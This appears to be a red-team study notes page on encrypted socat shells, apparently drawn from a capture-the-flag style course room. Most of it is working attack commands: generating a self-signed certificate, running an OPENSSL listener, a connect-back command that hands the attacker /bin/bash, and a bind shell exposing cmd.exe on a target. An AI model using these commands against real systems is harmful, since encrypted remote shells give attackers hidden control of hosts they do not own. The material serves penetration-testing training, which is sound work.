RedTeam
4.Exploitation
Shell-and-Reverse-Shell
2.Listeners
Socat Encrypted

Command

socat <options> TCP4:IP:PORT

or

socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

  • Options ---> https://www.redhat.com/sysadmin/getting-started-socat (opens in a new tab)

  • TCP4 ---> Type of network connection

  • Certification Creation (Important Before Using Socat)

    We first need to generate a certificate in order to use encrypted shells. This is easiest to do on our attacking machine:

    openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

    This command creates a 2048 bit RSA key with matching cert file, self-signed, and valid for just under a year. When you run this command it will ask you to fill in information about the certificate. This can be left blank, or filled randomly.

    We then need to merge the two created files into a single .pem file:

    cat shell.key shell.crt > shell.pem

    Now, when we set up our reverse shell listener, we use:

    socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -

    This sets up an OPENSSL listener using our generated certificate. verify=0 tells the connection to not bother trying to validate that our certificate has been properly signed by a recognised authority. Please note that the certificate must be used on whichever device is listening.

    To connect back, we would use:

    socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash

    The same technique would apply for a bind shell:

    Target:

    socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

    Attacker:

    socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -

    Again, note that even for a Windows target, the certificate must be used with the listener, so copying the PEM file across for a bind shell is required.

    The following image shows an OPENSSL Reverse shell from a Linux target. As usual, the target is on the right, and the attacker is on the left:

    This technique will also work with the special, Linux-only TTY shell covered in the previous task -- figuring out the syntax for this will be the challenge for this task. Feel free to use the Linux Practice box (deployable at the end of the room) to experiment if you're struggling to obtain the answer.

What is Socat

Socat is like netcat on steroids. It can do all of the same things, and many more. Socat shells are usually more stable than netcat shells out of the box. In this sense it is vastly superior to netcat; however, there are two big catches:

  1. The syntax is more difficult
  2. Netcat is installed on virtually every Linux distribution by default. Socat is very rarely installed by default.
NetcatFile Sharing Windows and Linux